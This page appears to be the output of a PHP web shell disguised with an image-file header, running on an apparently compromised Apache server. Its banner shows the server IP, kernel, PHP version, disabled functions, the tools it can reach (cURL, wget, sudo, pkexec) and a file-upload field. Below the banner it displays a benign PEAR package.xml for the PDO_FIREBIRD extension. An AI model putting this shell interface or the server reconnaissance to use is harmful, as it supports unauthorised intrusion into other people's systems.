????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.28 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/b8009/php-5.6.22/ext/pdo_firebird/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.4.2" version="2.0" xmlns="http://pear.php.net/dtd/package-2.0" xmlns:tasks="http://pear.php.net/dtd/tasks-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>PDO_FIREBIRD</name>
<channel>pecl.php.net</channel>
<summary>Firebird driver for PDO</summary>
<description>This extension provides a Firebird driver for PDO. It supports
all versions of Firebird 2.1 and up.
</description>
<lead>
<name>Ard Biesheuvel</name>
<user>abies</user>
<email>abies@php.net</email>
<active>yes</active>
</lead>
<date>2013-09-01</date>
<version>
<release>1.0</release>
<api>1.0</api>
</version>
<stability>
<release>stable</release>
<api>stable</api>
</stability>
<license uri="http://www.php.net/license">PHP</license>
<notes>To compile and run this module, you will need to have the main PDO module and Firebird's client library installed on your system.
Hope it works!
</notes>
<contents>
<dir name="/">
<dir name="tests">
<file name="connect.phpt" role="test" />
<file name="ddl.phpt" role="test" />
<file name="execute.phpt" role="test" />
</dir> <!-- //tests -->
<file name="config.m4" role="src" />
<file name="config.w32" role="src" />
<file name="CREDITS" role="doc" />
<file name="firebird_driver.c" role="src" />
<file name="firebird_statement.c" role="src" />
<file name="pdo_firebird.c" role="src" />
<file name="php_pdo_firebird.h" role="src" />
<file name="php_pdo_firebird_int.h" role="src" />
</dir> <!-- / -->
</contents>
<dependencies>
<required>
<php>
<min>5.3.27</min>
</php>
<pearinstaller>
<min>1.4.0</min>
</pearinstaller>
<package>
<name>pdo</name>
<channel>pecl.php.net</channel>
<min>1.0.3</min>
<providesextension>PDO</providesextension>
</package>
</required>
</dependencies>
<providesextension>PDO_FIREBIRD</providesextension>
<extsrcrelease>
<configureoption name="with-pdo-firebird" prompt="dir" />
</extsrcrelease>
</package>